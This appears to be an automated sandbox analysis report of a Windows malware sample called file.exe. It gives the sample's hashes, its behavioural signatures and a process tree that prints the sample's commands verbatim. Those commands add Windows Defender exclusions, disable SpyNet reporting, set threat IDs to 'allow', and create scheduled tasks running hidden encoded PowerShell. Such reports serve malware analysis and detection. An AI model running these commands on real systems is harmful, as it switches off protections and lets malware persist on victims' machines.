Analysis

  • max time kernel
    91s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-09-2022 10:07

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    42e0304972c1bcd3730d6f4abb53eb53

  • SHA1

    c203864796ff4b511e28bcb5db50fc01547c8b22

  • SHA256

    8a5bc0c96789c4f851d8448cc8da891152f475f188b782f44238c5720d246d89

  • SHA512

    664aeff81ea845cf7f5ae01bbfade5eb443e4971d47326d877ae14bc8ef0ccf154680bbcedf7eb785dbc88af1942c6b75e442ce06c00b317b2f0df3364894c51

  • SSDEEP

    196608:91ObSkfIVMsR40tzzRpV/OT19ZQ+NjgjELeDfOTnpjF6GhDyTAhyzLF9ik:3ObSPVMstt5POT1bNYDfy8kDy5zp9F

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Users\Admin\AppData\Local\Temp\7zS6900.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3436
      • C:\Users\Admin\AppData\Local\Temp\7zS6BBF.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3076
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1744
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3656
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:1496
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3288
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3636
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2828
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:4276
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1468
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gbLjdchqS" /SC once /ST 04:32:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:4416
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gbLjdchqS"
                  4⤵
                    PID:1816
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gbLjdchqS"
                    4⤵
                      PID:4596
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "beNJzxXkYGhzSCmkZn" /SC once /ST 12:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\klRQIue.exe\" Qf /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:4024
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:216
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:832
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:2672
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:2312
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:1896
                      • C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\klRQIue.exe
                        C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\klRQIue.exe Qf /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:1424
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4696
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                              PID:3916
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                4⤵
                                  PID:3972
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:5096
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:444
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:4232
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:4720
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:4044
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:2316
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:5064
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:1416
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:780
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:1472
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:4620
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:2612
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:3288
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:3008
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:2776
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:1448
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:1732
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:3704
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:2708
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:948
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:1876
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:4808
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:4736
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CXdyuXxQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CXdyuXxQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCSurMlfClMRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCSurMlfClMRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YnFPtusxCOTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YnFPtusxCOTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bOFQhydRtxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bOFQhydRtxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RIEoyfpemMjlUPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RIEoyfpemMjlUPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MNBTbrbBidagOXts\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MNBTbrbBidagOXts\" /t REG_DWORD /d 0 /reg:64;"
                                                                            2⤵
                                                                            • Drops file in System32 directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4728
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:32
                                                                              3⤵
                                                                                PID:3508
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:3664
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:64
                                                                                  3⤵
                                                                                    PID:1180
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:32
                                                                                    3⤵
                                                                                      PID:4464
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:64
                                                                                      3⤵
                                                                                        PID:3452
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:32
                                                                                        3⤵
                                                                                          PID:3584
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:724
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:4784
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:64
                                                                                              3⤵
                                                                                                PID:2152
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:32
                                                                                                3⤵
                                                                                                  PID:564
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:4256
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RIEoyfpemMjlUPVB /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:3276
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RIEoyfpemMjlUPVB /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:1896
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:3540
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:4220
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MNBTbrbBidagOXts /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                              PID:4076
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MNBTbrbBidagOXts /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:5024
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "gyzoOcQeG" /SC once /ST 02:29:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                              2⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:3748
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn "gyzoOcQeG"
                                                                                                              2⤵
